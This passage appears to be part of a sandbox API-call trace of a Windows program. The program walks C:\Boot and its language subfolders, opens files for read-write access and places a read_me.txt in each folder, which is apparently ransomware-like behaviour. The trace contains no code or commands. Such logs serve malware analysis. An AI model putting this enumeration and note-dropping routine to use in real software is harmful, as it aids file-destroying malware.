ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="hu-HU", cAlternateFileName="")) returned 1 [0073.603] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\hu-HU") returned 17 [0073.603] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac061300, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="it-IT", cAlternateFileName="")) returned 1 [0073.603] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\it-IT") returned 17 [0073.603] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="ja-JP", cAlternateFileName="")) returned 1 [0073.603] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ja-JP") returned 17 [0073.603] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac087460, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="ko-KR", cAlternateFileName="")) returned 1 [0073.603] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ko-KR") returned 17 [0073.603] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac087460, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0x8bc7dbfe, ftLastWriteTime.dwHighDateTime=0x1cb892b, nFileSizeHigh=0x0, nFileSizeLow=0x76980, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="memtest.exe", cAlternateFileName="")) returned 1 [0073.603] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\memtest.exe") returned 23 [0073.603] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\memtest.exe" (normalized: "c:\\boot\\memtest.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac087460, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="nb-NO", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nb-NO") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="nl-NL", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\nl-NL") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="pl-PL", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pl-PL") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0ad5c0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0ad5c0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0ad5c0, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="pt-BR", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-BR") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="pt-PT", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\pt-PT") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="ru-RU", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\ru-RU") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="sv-SE", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\sv-SE") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="tr-TR", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\tr-TR") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0d3720, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0d3720, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0d3720, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="zh-CN", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-CN") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="zh-HK", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-HK") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\zh-TW") returned 17 [0073.604] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac0f9880, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac0f9880, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xac0f9880, ftLastWriteTime.dwHighDateTime=0x1d2de32, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="zh-TW", cAlternateFileName="")) returned 0 [0073.604] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.604] wnsprintfW (in: pszDest=0x8a70098, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\read_me.txt") returned 23 [0073.604] GetProcessHeap () returned 0x280000 [0073.604] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a70098 | out: hHeap=0x280000) returned 1 [0073.605] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 0 [0073.605] GetProcessHeap () returned 0x280000 [0073.605] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a00060 | out: hHeap=0x280000) returned 1 [0073.605] GetProcessHeap () returned 0x280000 [0073.605] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a00060 [0073.605] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\*") returned 19 [0073.605] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\*", lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16754f50, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16754f50, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2b2678 [0073.605] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\.") returned 19 [0073.606] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x16754f50, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16754f50, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.606] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\..") returned 20 [0073.606] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac015040, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac015040, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe88a2888, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x15c50, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.606] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui") returned 33 [0073.606] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\bootmgr.exe.mui" (normalized: "c:\\boot\\cs-cz\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.606] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16754f50, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16754f50, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16754f50, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.606] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\read_me.txt") returned 29 [0073.606] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\cs-CZ\\read_me.txt" (normalized: "c:\\boot\\cs-cz\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7bc [0073.606] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.606] CloseHandle (hObject=0x7bc) returned 1 [0073.606] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x16754f50, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x16754f50, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x16754f50, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.606] FindClose (in: hFindFile=0x2b2678 | out: hFindFile=0x2b2678) returned 1 [0073.606] wnsprintfW (in: pszDest=0x8a00060, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\cs-CZ\\read_me.txt") returned 29 [0073.606] GetProcessHeap () returned 0x280000 [0073.606] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a00060 | out: hHeap=0x280000) returned 1 [0073.606] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 1 [0073.606] GetProcessHeap () returned 0x280000 [0073.606] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a20070 | out: hHeap=0x280000) returned 1 [0073.700] GetProcessHeap () returned 0x280000 [0073.700] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x89e0050 [0073.700] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\*") returned 19 [0073.700] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\el-GR\\*", lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.700] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\.") returned 19 [0073.700] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.700] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\..") returned 20 [0073.700] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac03b1a0, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac03b1a0, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xea239054, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x17250, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.700] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui") returned 33 [0073.700] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\bootmgr.exe.mui" (normalized: "c:\\boot\\el-gr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.700] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1677b0b0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.700] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\read_me.txt") returned 29 [0073.700] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\el-GR\\read_me.txt" (normalized: "c:\\boot\\el-gr\\read_me.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.701] StrStrW (lpFirst="read_me.txt", lpSrch="read_me.txt") returned="read_me.txt" [0073.701] CloseHandle (hObject=0x7ac) returned 1 [0073.701] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1677b0b0, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x1677b0b0, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x1677b0b0, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 0 [0073.701] FindClose (in: hFindFile=0x2b2638 | out: hFindFile=0x2b2638) returned 1 [0073.701] wnsprintfW (in: pszDest=0x89e0050, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Boot\\el-GR\\read_me.txt") returned 29 [0073.701] GetProcessHeap () returned 0x280000 [0073.701] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x89e0050 | out: hHeap=0x280000) returned 1 [0073.701] InterlockedExchangeAdd (in: Addend=0x40f16c, Value=1 | out: Addend=0x40f16c) returned 5 [0073.701] GetProcessHeap () returned 0x280000 [0073.701] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a50088 | out: hHeap=0x280000) returned 1 [0073.837] GetProcessHeap () returned 0x280000 [0073.838] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b80120 [0073.838] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\*") returned 19 [0073.838] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Boot\\fr-FR\\*", lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2b2638 [0073.838] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\.") returned 19 [0073.838] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0073.838] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\..") returned 20 [0073.838] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xac061300, ftCreationTime.dwHighDateTime=0x1d2de32, ftLastAccessTime.dwLowDateTime=0xac061300, ftLastAccessTime.dwHighDateTime=0x1d2de32, ftLastWriteTime.dwLowDateTime=0xe86b3703, ftLastWriteTime.dwHighDateTime=0x1ca0420, nFileSizeHigh=0x0, nFileSizeLow=0x16c40, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="bootmgr.exe.mui", cAlternateFileName="BOOTMG~1.MUI")) returned 1 [0073.838] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui") returned 33 [0073.838] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\bootmgr.exe.mui" (normalized: "c:\\boot\\fr-fr\\bootmgr.exe.mui"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0073.838] FindNextFileW (in: hFindFile=0x2b2638, lpFindFileData=0x762fb60 | out: lpFindFileData=0x762fb60*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x167a1210, ftCreationTime.dwHighDateTime=0x1d59ffe, ftLastAccessTime.dwLowDateTime=0x167a1210, ftLastAccessTime.dwHighDateTime=0x1d59ffe, ftLastWriteTime.dwLowDateTime=0x167a1210, ftLastWriteTime.dwHighDateTime=0x1d59ffe, nFileSizeHigh=0x0, nFileSizeLow=0x6b3, dwReserved0=0x7040acc3, dwReserved1=0x0, cFileName="read_me.txt", cAlternateFileName="")) returned 1 [0073.838] wnsprintfW (in: pszDest=0x8b80120, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Boot\\fr-FR\\read_me.txt") returned 29 [0073.838] CreateFileW (lpFileName="\\\\?\\C:\\Boot\\fr-FR\\read_me.txt" (normalized: "c:\\boot\\fr-fr\\read_me.txt"), dwDesiredAccess=0xc0000000, 